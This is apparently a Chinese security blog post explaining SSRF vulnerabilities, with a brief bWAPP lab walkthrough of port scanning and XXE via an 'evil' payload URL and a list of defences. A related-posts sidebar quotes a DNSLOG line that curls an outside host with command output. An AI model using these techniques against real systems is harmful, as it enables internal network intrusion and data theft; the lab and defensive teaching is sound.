SSRF漏洞:

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。

一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。

1.SSRF漏洞就是通过篡改获取资源请求发送给服务器,

2.但是服务器并没有发现在这个请求是合法的

3.然后服务器以他的身份来访问其他服务器的资源

SSRF的作用:

  • 扫描内网网络

  • 向内内部的任意主机的任意端口发送惊醒构造的数据包

  • DOS(请求大文件,始终保持连接)

  • 暴力穷举(users/dirs/files)

894412-20160910112127848-1995894242

下面是简单SSRF-RFL和SSRF-XEE的简单演示。(操作环境为bWAPP):

首先打开我们的SSRF模块

1558002416474

然后看到这模块低下有Port scan(RFI)和Access(XEE)模块,点击Port scan,获取exp的ip地址:

1
http://169.254.6.241/evil/ssrf-1.txt

然后打开RFI的模块,如图

1558002638082

然后把exp的IP 地址写到language=的后面,POST一个内网的IP 地址,可以看到这个地址开启的端口,如下:

1558002852215

然后是SSRF-XEE的演示,如下 ,点击Access的获取payload,如下

1558003505441

然后切换到XEE模块,拦截数据包

1558003833905

然后写入XEE

1558003897002

读取页面信息的XEE

1558004003309

防御SSRF

1.过滤返回信息,验证远程服务器对请求的响应是比较容易的方法;

2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态

3.限制请求的端口为http常用的端口,比如.80,443,8080,8090

4.黑名单内网IP.避免应用被用来获取内网数据,攻击内网;

5.禁用不需要的协议。仅允许http和https请求;

6.使用正则对参数进行效验,防止畸形请求染过黑名单。

相关文章
评论
分享
  • CSRF原理及演示

    CSRF(Crosss Site Request Forgery,跨站请求伪造)是一种网络攻击方式,也被产称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF. CSRF漏洞是因...

    CSRF原理及演示
  • XSS的payload构造及变形

    通常进行XSS脚本攻击时,一般网站都是有防护措施的,比如过滤掉我们script,javascript,或者长度限制等等,这时需要我们对我们的脚本进 行简单的变形,打到我们的目的,下面是我对常见的一些变形的分类,以及部分操作演示1.使用...

    XSS的payload构造及变形
  • XSS漏洞利用和beef使用

    安装好的kail XSS漏洞环境(这里我用的是bWAPP,百度安装即可) 首先打开我们的kail,打开我们的beef工具: q切换到/usr/share/beef-xss或者输入如下代码启动: 1./beef 然后登陆...

    XSS漏洞利用和beef使用
  • 存储型xss-H5页面截取

    环境准备 一个有XSS漏洞的页面,或者搭建一个漏洞平台 注册一个线上的XSS漏洞测试平台(有能力可以自己搭) 1.首先我们需要搭建一个本地的漏洞测试平台,这里我用的事pikachu漏洞平台(https://github.com/...

    存储型xss-H5页面截取
  • 一句话木马及变形

    一句话木马变形 介绍:网站后门,也可以叫做WebShell,黑客在入侵了一个网站后,通常会将一些asp或php文件与网 站服务器WEB目录下正常的网页文件混在一起,使得可以通过使用浏览器来访问这些asp或者php 文件,从而得到一个命...

    一句话木马及变形
  • 文件包含漏洞和PHP伪协议

    文件包含的漏洞形成文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshel...

    文件包含漏洞和PHP伪协议
  • DNSLOG在盲注中的使用

    DNSLOG在盲注中的使用0x00 Command Execution i. *nix:12curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj...

    DNSLOG在盲注中的使用
  • sql注入(二)

    报错注入、​ 报错函数(举例) ​ (1)extractvalue(参数1,参数2) ​ 从目标XML中返回查询的字符串,参数1 是string格式...

    sql注入(二)
  • sql注入(一)

    sql注入漏洞,主要介绍有以下几种 5.0mysql数据库特性 手工注入一般步骤 常用的万能密码 联和注入 基于布尔的盲注 基于时间的盲注 5.0mysql数据库特性information _schema 自带,系统库...

    sql注入(一)
  • msf浏览器自动攻击

    msf浏览器自动攻击 首先查看数据库状态 ,并启动数据库12/etc/init.d/postgresql status/etc/init.d/postgresql start 打开msf:1msfconsole 搜索我们需要的浏览器...

    msf浏览器自动攻击
Please check the comment setting in config.yml of hexo-theme-Annie!